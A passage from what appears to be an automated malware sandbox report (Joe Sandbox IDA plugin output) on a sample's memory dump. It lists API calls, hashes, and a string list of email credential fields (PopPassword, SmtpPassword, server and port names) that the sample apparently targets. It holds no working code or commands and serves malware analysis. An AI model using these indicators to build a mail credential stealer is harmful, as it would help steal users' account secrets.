                      • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CoInitialize.OLE32(00000000), ref: 0040438F
                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                      • VariantInit.OLEAUT32(?), ref: 004043C4
                      • SysAllocString.OLEAUT32(?), ref: 004043CD
                      • VariantInit.OLEAUT32(?), ref: 00404414
                      • SysAllocString.OLEAUT32(?), ref: 00404419
                      • VariantInit.OLEAUT32(?), ref: 00404431
                      Memory Dump Source
                      • Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd
                      Yara matches
                      Similarity
                      • API ID: InitVariant$AllocString$CreateInitializeInstance
                      • String ID:
                      • API String ID: 1312198159-0
                      • Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                      • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                      • Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                      • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                      • API String ID: 0-2111798378
                      • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                      • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                      • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                      • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                      Memory Dump Source
                      • Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd
                      Yara matches
                      Similarity
                      • API ID: recv
                      • String ID:
                      • API String ID: 1507349165-0
                      • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                      • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                      • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                      • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                      • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                      • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                      • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd
                      Yara matches
                      Similarity
                      • API ID: _wmemset$ErrorLast
                      • String ID: IDA$IDA
                      • API String ID: 887189805-2020647798
                      • Opcode ID: 8c9f743a95e2ed60ca48ebb2a141374e00de6ead3e6b7acbc24c92b4cfb516c3
                      • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                      • Opcode Fuzzy Hash: 8c9f743a95e2ed60ca48ebb2a141374e00de6ead3e6b7acbc24c92b4cfb516c3
                      • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                      • socket.WS2_32(?,?,?), ref: 00404E7A
                      • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                      Memory Dump Source
                      • Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd
                      Yara matches
                      Similarity
                      • API ID: freeaddrinfogetaddrinfosocket
                      • String ID:
                      • API String ID: 2479546573-0
                      • Opcode ID: 97c05e97c8173f6be26ae818b5776147fb3e9d7db23be9392c32e12bab91489d
                      • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                      • Opcode Fuzzy Hash: 97c05e97c8173f6be26ae818b5776147fb3e9d7db23be9392c32e12bab91489d
                      • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                      Uniqueness

                      Uniqueness Score: -1.00%